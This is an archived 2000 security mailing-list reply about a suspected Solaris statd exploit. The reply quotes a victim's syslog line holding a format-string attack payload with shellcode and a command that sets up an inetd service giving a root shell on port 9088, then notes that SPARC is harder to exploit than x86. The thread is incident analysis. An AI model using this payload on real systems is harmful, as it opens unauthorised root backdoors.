Security Incidents mailing list archives
Re: Solaris statd exploit?
From: Thomas Dullien <dullien () gmx de>
Date: Fri, 1 Sep 2000 11:54:10 +0200
I got this entry today on 3 different solaris boxes... Is this some kind of statd exploit? The OS is Solaris 8 (and Solaris 2.6)... All of the entries have the same pattern and time (probably 1 or 2 seconds difference). A script kiddie attack? ---- Aug 30 11:15:14 earth statd[236]: [ID 462824 auth.error] statd: attempt to create "/var/statmon/sm/%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%nK^v ^( ^ ^. #^1 F'F* FF+, NV1@/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i"/tmp/m; /usr/sbin/inetd /tmp/m;"
This seems to be an exploit for the statd format string issues ... btw, you running on an Intel or SPARC Cpu ? If you're running a SPARC, I'd say that most likely you are a lot safer from exploitation of format string issues than on an x86, as alignment when overwriting addresses becomes important...
Current thread:
- Solaris statd exploit? Hartoyo (Aug 31)
- Re: Solaris statd exploit? Fyodor (Aug 31)
- Solaris statd exploit? Klaus Moeller (Aug 31)
- <Possible follow-ups>
- Re: Solaris statd exploit? Thomas Dullien (Aug 31)